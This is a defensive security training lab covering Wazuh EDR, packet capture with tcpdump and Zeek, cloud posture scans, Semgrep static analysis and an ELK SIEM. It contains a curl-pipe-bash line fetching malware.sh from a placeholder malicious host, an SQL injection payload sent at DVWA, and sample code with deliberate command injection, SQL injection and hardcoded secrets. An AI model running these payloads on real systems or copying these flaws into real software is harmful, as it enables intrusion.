Security Tools Lab
Objective
Deploy and use four categories of security tools: EDR (endpoint), network analysis, CSPM (cloud), and SAST (application security).
Lab Setup
Prerequisites
- Linux VM (Ubuntu 22.04+) with Docker
- AWS account (free tier) OR Azure subscription
- Sample web application (DVWA or a local Node.js app)
Exercise 1: Deploy EDR Sensor
```bash
# Install Wazuh (open-source EDR/SIEM) via Docker
git clone https://github.com/wazuh/wazuh-docker.git
cd wazuh-docker/single-node
docker-compose up -d

# Access: https://localhost:443 (admin/SecretPassword)
# Deploy agent on a test VM:
# Wazuh → Agents → Deploy new agent
# Select OS: Linux, Server IP: <your-server-ip>

# Or install agent manually (run as root):
curl -s https://packages.wazuh.com/key/GPG-KEY-WAZUH | apt-key add -
echo "deb https://packages.wazuh.com/4.x/apt/ stable main" | tee /etc/apt/sources.list.d/wazuh.list
apt-get update
# WAZUH_MANAGER tells the package which manager the agent should report to
WAZUH_MANAGER="<your-server-ip>" apt-get install wazuh-agent
systemctl start wazuh-agent

# Verify agent is connected
# Wazuh Dashboard → Agents → (should show active agent)
```
Task: Generate a test alert by running a suspicious command on the agent:
```bash
# On the agent VM
curl http://malicious.example.com/malware.sh | bash

# Check Wazuh dashboard for the alert
```
Exercise 2: Network Traffic Capture and Analysis
```bash
# Start a packet capture on your test VM
sudo tcpdump -i eth0 -w lab-capture.pcap -c 10000

# Generate some traffic (from a second terminal while the capture runs)
curl http://example.com
curl https://google.com
ping -c 5 8.8.8.8
nslookup github.com

# Stop the capture (Ctrl+C)

# Analyse with tcpdump
tcpdump -r lab-capture.pcap -nn

# Top talkers
tcpdump -r lab-capture.pcap -nn | awk '{print $3}' | cut -d. -f1-4 | sort | uniq -c | sort -nr | head

# DNS queries
tcpdump -r lab-capture.pcap -nn port 53

# Analyse with Zeek (if installed)
zeek -r lab-capture.pcap local
cat conn.log | zeek-cut ts id.orig_h id.resp_h proto service duration | head
cat dns.log | zeek-cut query answer | head
```
Task: Identify the top 5 destination IPs and determine what services they are (use nmap -sV or dig to identify).
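For the task above, one way to rank destination endpoints straight from Zeek's conn.log, counting connections per destination IP, port/protocol and detected service. This is an added example, not part of the original lab: the function names and the sample rows are constructed, and the log is assumed to be in Zeek's default TSV format with a #fields header (JSON-formatted logs need a different parser).

```bash
#!/usr/bin/env bash
# Added example: rank destination endpoints in a Zeek conn.log (TSV format).

# Constructed sample rows in conn.log layout, reduced to seven columns.
sample_conn_log() {
  printf '#separator \\x09\n#path\tconn\n'
  printf '%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\n' \
    '#fields' ts id.orig_h id.orig_p id.resp_h id.resp_p proto service
  printf '%s\t%s\t%s\t%s\t%s\t%s\t%s\n' \
    1700000000.1 10.0.0.5 40001 192.0.2.53   53 udp  dns \
    1700000000.2 10.0.0.5 40002 192.0.2.53   53 udp  dns \
    1700000000.3 10.0.0.5 40003 192.0.2.53   53 udp  dns \
    1700000001.0 10.0.0.5 51000 198.51.100.7 80 tcp  http \
    1700000002.0 10.0.0.5 51001 198.51.100.7 80 tcp  http \
    1700000003.0 10.0.0.5 8     8.8.8.8      0  icmp -
}

# top_dests [N]: read conn.log on stdin, print the N busiest destinations
# as "count <TAB> resp_ip <TAB> resp_port/proto <TAB> service".
top_dests() {
  awk -F'\t' '
    # Map column names to positions from the header, so the function keeps
    # working when the log has more (or reordered) columns.
    $1 == "#fields" { for (i = 2; i <= NF; i++) col[$i] = i - 1; next }
    /^#/ { next }
    !("id.resp_h" in col) {
      print "conn.log has no #fields header" > "/dev/stderr"; exit 2
    }
    {
      key = $(col["id.resp_h"]) "\t" $(col["id.resp_p"]) "/" $(col["proto"]) \
            "\t" $(col["service"])
      n[key]++
    }
    END { for (k in n) printf "%d\t%s\n", n[k], k }
  ' | sort -t "$(printf '\t')" -k1,1nr -k2,2 | head -n "${1:-5}"
}

# Demo on the constructed sample; on a real capture: top_dests 5 < conn.log
sample_conn_log | top_dests 5
```

A service of "-" means Zeek did not identify the protocol on that port, which makes those rows the ones to follow up with nmap -sV or dig.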
Exercise 3: Run a CSPM Scan
```bash
# Install ScoutSuite
pip install scoutsuite

# Configure AWS credentials
export AWS_ACCESS_KEY_ID=AKIA...
export AWS_SECRET_ACCESS_KEY=...

# Run a scan
scout aws --report-dir ./scout-report

# Open the HTML report
# Open scout-report/scoutsuite-report.html in browser

# Find at least 3 findings and note the recommended remediation
```
Task: Identify the top 3 security issues in your cloud account and document what AWS config changes are needed to fix them.
Exercise 4: SAST Scan
```bash
# Create a deliberately vulnerable test file
cat > test-vuln.js << 'EOFF'
const express = require('express');
const app = express();

// Command Injection Vulnerability
app.get('/ping', (req, res) => {
  const ip = req.query.ip;
  const result = require('child_process').execSync(`ping -c 1 ${ip}`);
  res.send(result.toString());
});

// SQL Injection Vulnerability
app.get('/user', (req, res) => {
  const id = req.query.id;
  const query = `SELECT * FROM users WHERE id = ${id}`;
  db.execute(query, (err, rows) => {
    res.json(rows);
  });
});

// Hardcoded Secret
const API_KEY = "sk-live-abc123def456ghi789jkl";
app.listen(3000);
EOFF

# Run Semgrep scan
pip install semgrep
semgrep scan --config=auto test-vuln.js

# Expected findings:
# 1. Command injection (CWE-78)
# 2. SQL injection (CWE-89)
# 3. Hardcoded secret (CWE-798)
```
Task: Fix each vulnerability and run semgrep again to confirm the findings are resolved.
Deliverables
- EDR: Screenshot of Wazuh dashboard showing an active agent and at least one security alert
- Network: Screenshot of tcpdump/Zeek output showing DNS queries and top talkers
- CSPM: Screenshot of ScoutSuite report showing at least 3 findings
- SAST: Screenshot of Semgrep output showing 3+ findings, then screenshot after fixes (0 findings)
Bonus Challenge
Set up a complete CI/CD pipeline with security scanning:
- Create a GitHub repository with a sample Node.js app
- Add GitHub Actions workflow with SAST (Semgrep), SCA (Dependabot), and secret scanning (TruffleHog)
- Create a pull request with a deliberate vulnerability
- Show that the pipeline blocks the PR
Tip
The bonus challenge simulates a real DevSecOps pipeline. The key insight: security scanning integrated into CI/CD is vastly more effective than periodic scanning because every change is checked before it reaches production.
Step-by-Step Lab Guide
Lab 1: Deploy EDR Sensor
```bash
# Install CrowdStrike Falcon sensor (or use free alternative: Wazuh)
# Wazuh is open-source EDR/XDR — suitable for lab use

docker run -d \
  --name wazuh-manager \
  -p 1514:1514/udp \
  -p 1515:1515 \
  -p 55000:55000 \
  wazuh/wazuh-manager

# On the target machine, install Wazuh agent
docker run -d \
  --name wazuh-agent \
  -e MANAGER_IP=10.0.0.100 \
  wazuh/wazuh-agent

# Verify agent is connected
# The Wazuh API issues a JWT first; -k accepts the lab's self-signed certificate
TOKEN=$(curl -s -k -u wazuh:wazuh -X POST "https://localhost:55000/security/user/authenticate?raw=true")
curl -s -k -H "Authorization: Bearer $TOKEN" https://localhost:55000/agents
```
Lab 2: Network Traffic Analysis
```bash
# Capture traffic between two containers
docker network create security-lab

# Deploy vulnerable web app
docker run -d \
  --name dvwa \
  --network security-lab \
  --network-alias dvwa \
  -p 8080:80 \
  vulnerables/web-dvwa

# Capture traffic
# The sniffer shares dvwa's network namespace so its eth0 sees the web app's
# traffic (a separate container on the bridge would only see its own), and
# ./pcap is mounted at /data so the capture file ends up on the host.
mkdir -p pcap
docker run -d \
  --name sniffer \
  --network container:dvwa \
  --cap-add NET_ADMIN \
  -v "$PWD/pcap:/data" \
  nicolaka/netshoot \
  tcpdump -i eth0 -w /data/capture.pcap

# Generate malicious traffic
curl -X POST "http://localhost:8080/vulnerabilities/sqli/" \
  -d "id=1' OR '1'='1&Submit=Submit"

# Stop capture and analyse with Wireshark (download pcap)
```
Lab 3: CSPM Scan
```bash
# Install Prowler for AWS assessment
pip install prowler

# Configure AWS credentials (use a test/dedicated account)
export AWS_ACCESS_KEY_ID=AKIA...
export AWS_SECRET_ACCESS_KEY=...

# Run scan
prowler aws -M html,json

# View results
open prowler/output/html/index.html

# Install ScoutSuite for multi-cloud
pip install scoutsuite

# Run ScoutSuite
scout aws
```
Lab 4: SAST with Semgrep
```bash
# Install Semgrep
pip install semgrep

# Create a sample vulnerable app
cat > vulnerable-app.py << 'EOF'
import sqlite3
from flask import Flask, request

app = Flask(__name__)

@app.route('/user/<int:user_id>')
def get_user(user_id):
    # BAD: SQL injection vulnerability
    conn = sqlite3.connect('users.db')
    query = f"SELECT * FROM users WHERE id = {user_id}"
    result = conn.execute(query).fetchone()
    return {"username": result[0]}

@app.route('/login')
def login():
    username = request.args.get('username')
    password = request.args.get('password')
    # BAD: Hardcoded credentials
    if username == "admin" and password == "password123":
        return {"status": "success"}
    return {"status": "fail"}
EOF

# Run Semgrep scan
semgrep scan --config=auto vulnerable-app.py
```
Lab 5: SIEM Integration
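```bash
# Deploy ELK stack for log analysis
# Both containers join the security-lab network so Kibana can resolve the
# name "elasticsearch". Elasticsearch 8.x enables TLS and authentication by
# default; they are switched off here (lab only) so the plain-HTTP URLs work.
docker run -d \
  --name elasticsearch \
  --network security-lab \
  -p 9200:9200 \
  -e "discovery.type=single-node" \
  -e "xpack.security.enabled=false" \
  docker.elastic.co/elasticsearch/elasticsearch:8.11.0

docker run -d \
  --name kibana \
  --network security-lab \
  -p 5601:5601 \
  -e ELASTICSEARCH_HOSTS=http://elasticsearch:9200 \
  docker.elastic.co/kibana/kibana:8.11.0

# Ingest Zeek logs into Elasticsearch
# Install Filebeat on the machine running Zeek
filebeat setup --index-management -E output.logstash.enabled=false \
  -E 'output.elasticsearch.hosts=["localhost:9200"]'

# Create dashboard in Kibana for Zeek conn.log, dns.log, http.log
```
Deliverables Checklist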
- Lab environment deployed (Docker with security-lab network)
- EDR/Wazuh agent installed and reporting
- Network capture of SQL injection attempt
- CSPM scan (Prowler or ScoutSuite) results
- SAST scan results showing vulnerability findings
- Bonus challenge: CI/CD pipeline blocking vulnerable code
- SIEM dashboard with ingested logs